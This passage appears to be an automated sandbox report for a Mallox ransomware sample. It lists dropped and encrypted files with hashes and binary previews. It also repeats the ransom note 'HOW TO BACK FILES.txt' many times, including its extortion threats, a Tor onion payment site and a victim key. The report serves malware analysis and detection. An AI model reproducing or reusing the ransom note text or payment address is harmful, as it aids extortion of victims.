                    Preview:\..P..J..C..y....._e..e"....Jd.... ..\_4.#h^E.....B.3,..b.\Zb...-'...q*.@.|h.~......+.1>..k:#-....L{..CLQw.....b..5.h.o.......,.....@.F9.?P....mR/...p.T.....nXM...f.....5,....+th).K.g.h..R\.XX.3t.eVI{..%...]@;.X...c....>.\1.b........A.......:]..({I...rR0O?..!m .....[...4.../b.....v...WQ_.I1......L.Q.R..,3..E..XD1... .4._......S........k&{..+..wX.K...n..>...E.~......b...^...T...;.@......k......:t...)...%...B.W..d':...j..^..<.........vS..........m...$j.h............1.(@Mq.a..9+".b..R.H..}..h."....&.....ByKO.kJ~.....|Lz.:...L{..d^.....be}.6......Bj..\.tWu...;.~..@...C..yY.:.....(..E...G....H.|.z..l.......H.T[z..l....z|#m.~}.:...|.j..._.:T..*.....K.p..O....sL.?n.b..Vs...fo.4Bc;....9~x....+..E.p=.F..].a.Rm.F.>...e..+,......T#.......(.b..\..+..............S1VS...-.SZ..hA..f9.hj.bW#F..;"../.......~|`V.u.....F[..{f!...=B.....?J'..@.$.......\..&...... P..dF.|H..:-.{S.!...........=]v.Rb6.f..oM.n.3V.."..9.[/."k.0.l+...'......<rn..q.rq.f.$.

                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-05.0950.8672.1.odl

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):2.8625103924954094
                    Encrypted:false
                    SSDEEP:384:3KRsb4oMoOL5l4ZSRsOgz9QIqfuTJ4nGribaW3owhC2GK:es9ZOVNRspzSHWVwGri+4C2f
                    MD5:D9ED4826EF9142EAA9678D9E2727ADE3
                    SHA1:2B25DD2FAF7CD107EBB0C3C3B15AF1AA02068362
                    SHA-256:333CA1586FD33E30B223BA883590B367599A942A1F7EA7638838A1018E9D40AE
                    SHA-512:308740CF91F096627D3477A67BE24423433903457563E10A4DDFC00D3A629D2165C54FFCABD247046CBEAA1E6E1DAD9CEE52DD38618CBF459294C0EA8E4D2846
                    Malicious:false
                    Preview:&...E?..t..&.y..).. .&.........D..p.F...s..........]C@~......Z......5B..{z..va.rqX.".n...gPLc....x5..f ......c...f@ ..@...9..E7<..S...p.n...d.,........|#X...9s[.8.N{q.1...e].RO..y!.....je>.lC_J7....<E...u;..^D.5[....+..g..P........}.%}Va/...#=..D-4..m...{..>0.f.(.30~-....cL<.L7.M.>@.........P..;gT....+Jf......(.}m+q;.&....7. .J.20vMg ..'J2.f..g^v..... 9...<..a}.....z..".IS....EO..?."BY.l".P....'.......N.*........0.=.....}.X}d+.q[..U.....+.S(j.j=.V.h.n|&gw. .4.....{.$.W.$:5.g~..c.~.f...S>....=$&...:....>.X..}.'.......H|IN.y...d.....|.m...0._. T.-.Z.H|..m...r.g..;9../...t..z..Rs.ZH.._h......._k...)...M.ud.2U...).1U"o................&m&!..J..,.hb9..].....V..7gH7..._R%p.V..G......K.d.}.....k..Vf%P.$.[.;....B..h.6..w.>..v.........%n")a.z...9..p.Q.h...0..am}...K.I..s..hl_c....8...................w.....4. .E.W...;...J.i4..9~D......5...O..$]'-6)..@:6Z....>.Yy8....ck.m. 1[..L..>..L...%.|..Rzf.8...L......kV".5...y.e.r.M@.9..._&.(n.j.r.. N..lkR.g3...6

                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2023-10-05.0950.7664.1.aodl

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):4.662748825263218
                    Encrypted:false
                    SSDEEP:768:avbbdXnYQ3vvZiNgt2JyzuIrgd7MclejkZ0W4Ww+sU55:avb+CYgtbqdnejkZN4Ww+J55
                    MD5:740706B71E0E29D4CE602305296F3CB0
                    SHA1:B514B8D6043E73B82235E2D3E8F18E334C529FE4
                    SHA-256:3040563F62C7D309A52F120BE552A477EBC3DB200AFBF9BE4E42D2748F854A22
                    SHA-512:FE6D3C59573E2CA6B5CF8662166BFFDB17EF534391CF3BDEB0703359F11D18617BCE4E58B926B0CBB1CD0C55F7157682EDE1DC96A2ADE6748D31451B483840D0
                    Malicious:false
                    Preview:=O.E0.P..u.."Cgg-u.K....+.8./x../.V......e/....0.o...w.e.S>"..>..a....i.!...B...6....1.f..9...FwF..T92....6x..r=..."Qg..k.O...5...dk|u.........,@....sl..)....hLS.B:D.FYM.9.@..J0;s...zE..A...h..Qt...O.5\_..=6..B...2R)......V..z@`a.....2..~.*n&q.\>...Uof....q.<........<..[.1@.....E6..f.v...w......c.2.N.^......w 0.cE.....e......Q......e2..^...1......'4R..\.W.s.r%..d..- ...d.....P..._.....l..b..7N.-.h....mc.V.....X/../..oM.0.UT.B...v..9}.pY...K0z.W4.]rKv.B.4z.<...IBs.qH.....gw....Y.B.....9....>....Ua.{ ....g.P.q.;.*...[k...f...Ab...4n.]>.X...>..w.C.!LB...b&..C@u7z...&#.*i.U..c;(Wo..(.g..*.U....|ZN..#.=........w...o..1.:..$./.w.Za.^w.}.......Z%F..q....M.ro..Id.*..u.gR...Ef.....q..>........u.C..4c`.LD8-oh.......=..\.l.X.,....cjHX........e..9.=.{...M..#P\Gl......W...SK....V..b$..6.....U..8.#$.p.B...IQj@......f...X.....TM.W...a..`.......J.....@.o.........Uo.rl._......U.t..M2.../.'..d%...e.y.&..v.....S...PJ47...:.Z..H...+'..)\g.....7J.E.mU.

                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-05_095014_23f0-23e0.log

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):7.934520769499088
                    Encrypted:false
                    SSDEEP:3072:p1ceonJrZXHlvz7dXabOgCr7lL++/o+2vO3d:peeonFACXlL++/o+22
                    MD5:9546976269589DB60063B9EB2CF5415D
                    SHA1:885C8DEF252ACE17CFFF3CFC5203AE605CD2F9B0
                    SHA-256:A5DF75272959E20D0E308597D6E65B14E3A44913491CFB671F72E9DA72AA2AF0
                    SHA-512:CA2EFC40B9C83B3B39E6187B4216A3E0680EA7B76C58BA4531034FCD413DDDC37466479FF0C4539B15F4CE7B2913676D4FBD11BB10FBCF2A6D1FD894B6748E5B
                    Malicious:false
                    Preview:......."8.|.q.H...aRi.$.".5.I.......b).P.AD..qN..8g3."j.e....z..j0.U...W...)d........r...N.q.F...f.XD.v...N...Xqt.r.3...P..1...C,.G..s.z.....e........l/....*.g...:..Bb....@.t.,..H....S.jQ..nfL...Zn.&'.:..YB6.......a..7Lg.r.E.f....6M)M......O..#........e.u.$.K.|Q.&T...V..#..;H...-........!%0.?..~SW.....k>..]...Y.....#1....N...U.\. .G_h,-wP.H:`.R;.7..-C.].../f..-.e.X...xe..:...O.a...w..V^?..;..B,f.pVQ!.c.W.T:h.1..PH.../1,..)f..........s......]BI.YaP$...YQ.R.>.Z.Ua....K.Ddn..Xp..w.C.......C.Z.2..H....m..q..@...{...5...k..F.@..b..6B.L.oY....}..RrK..%GN;...2..eDK.7...4.i....H,..' :p.-=.ga......L.?......l......O...>.4.9.\. ...Q...h.yu...}.j.'.^.x#.5!.(a.`.....9.E.:SF.W8.OU.?....6.i*0..qw1h.uj..q}......x#..G9."jEn.l..X.&t..8..$.....x..Ul..Q.\.[..^t...K..iL..h....`..5~....bp.=.n.......3P{.....OqS..........H.u.............+..X..S.a.,.?i.]G...B[.....t/..Q..}....]..B.%.d.)rd..t9.C...y...a.AR.s..Y.)~y.!........*.!;......1.Q..3......).Q).1......6HD(.\.

                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-05_095041_7664-3424.log

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262144
                    Entropy (8bit):7.928259255780496
                    Encrypted:false
                    SSDEEP:6144:vUOe1msJikDMg2mLvMc96R9MDBsMJEh321iWyW3j0N:1e4qikDMcLv190QVJU2+W3
                    MD5:68AA3AA70D2EF4D05E5E25785F0D95F7
                    SHA1:3F2520FE2C7F7B969A468AE3302736E19D4A8742
                    SHA-256:E1160BFF3D24BD2CA8B78D107CE1B74073699E985794D563E6C1E20EAAB7D46B
                    SHA-512:C952A8C34147B32B7AF93099DAF61B6DC64124182E04F0C58AB9FED28BE367828126A6DD01F6C07828AE6439B023637B8E6519FE9876DC611D05DFACC633D93E
                    Malicious:false
                    Preview:p.H.*;Q.W.>..4Bh^...u]..E..3.o.M..l.6..Eu..%.Y../..=O.A..e]...]#.......3...:w6e.N.P..'..!...Y....D....x.....c........q....d..,.?=R.w...T\.0M.........DI...V..o.....E..V.x.....$r....XX...5..@]......h.U.^...F ....B).#`Aj.....L(.g.u.Y...kI.[..c.[../....6a..N3.{..!=....)..7.......V.q(a.....1..)".:...M....C...D.V5......|f......<.H.J..;.c....WG....Ig.k.|....t.........qN...4.:*@....?.|cnh4V.a.[..5.)...>c..e.......\.N.ul#...i...XvM.}..:U...0..#.y......(..N.2.K.Xe.B.jg%...r....y...[.Q.n=vC9.5.w.,..+..4.....*R..{.....$..3....oO>.7.....O2..q..J..tv.........Y~...^..A^..-.....W....*..A*....1..;.L)F...A........_.8..k..sX..0.q..0.......|...x.n......P#....G,.F._2.^y.....XokD.0 ;..Y...R.>..-N.!.6....%]$@.1.&]..n.)...0..:...Nh4.k.!.Hh../..N.B)h....{.i.^Ql_...m.D.|.m".O.fal.jN..#..h.....~3\2a.....o.r-W.1....I..b./.>.[..9.I:...Y...h.^..].=..,...R..@......)^....-O...+...`S..&3Y<........N7..DA..'..E.|[.Uv.&.(.+.d.R....'Z...*q....q9.jv....N....C.....U#N.r.+...U<.S

                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-05_095006_950-1db4.log

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):30042
                    Entropy (8bit):7.993793545764159
                    Encrypted:true
                    SSDEEP:768:GfSkPBCbhokOYgD4c1VPykK2ptH46NwIjupz+hB:GqSkpgMc19yHOlJKMB
                    MD5:EEFBF38B11F98A8AC94BE4C87D8319C6
                    SHA1:194D19AE1400F35C020391B0B94FEFEFF8F8637F
                    SHA-256:ACFBBDCEFDF4B07DEA478E40D0F64CD23D52B689ECF91F6E0F8B05CDA2119AB3
                    SHA-512:0B04F7FFE4101505B0E5B0D759D148F8D6BDC42E0878D504E6AE10E4EE92E23D4FEBE5EE0F380D827C8BB3FF4FF88273DD70B73BC010F63A6CF9AAD359260060
                    Malicious:true
                    Preview:.j.......]...X+..k...b.^!.(^..q/.L..k.*3....h...U...I.x..k\.;I*.T.`fD.c.w.....P............+/..".~.Q|n.,t...2.....1..BK.ii...vh.-Y..b.p..r.2Q..L.`._K.{..P.N........j.m:.&.R5......*.=.....p}..P.....f...P.;.....?ia..i.6.2r"...G1.n~....p. .0..8)...u.;.....N..0(........k.d..(..*..s..{......B.....Q.7V.c'}h.n.=6..{...o:....U.u...4F.:]....].G...C.U..<.x.2.L...M.$=...x....."..z;..E#.+e..3.?~B...nK..'.A...W.n.{e.T...n... ... u..../WO.....%O.Eh..O.8.-...3...;3pCT....[W..5..nT;G.u_...F.u.JK.sj.^.0.>..Tk!.Xa\....7....cN.,..N..({....S.0..zr.g...C....d.H.@.=_......Y....$.^7.......z.o9..#...i=X...Vh*...|_.x.....o.P)......%"w^.y.%&.7|..ll.6..r......s....TE^$<..@^..Wi..../.LT[.....u....N)Z..%..X...i'`.co.x.-..|....1..U....|n.X.Fa.%b..sB...%..@.L.o:.......{7..NX.....+N"...z.y.g...3../..E..1D.....]...v..T..$.-J...@|......~.n.P....n....x.f.z..c....u".Rs.=`Z.@.'.\...D.]5..F]77...A....s.....f:... .^..$:.f...[.4.....z...v...cO.}a..b.W.jC......8

                    C:\Users\user\AppData\Local\Microsoft\Windows\History\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012023100520231006\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\History.IE5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
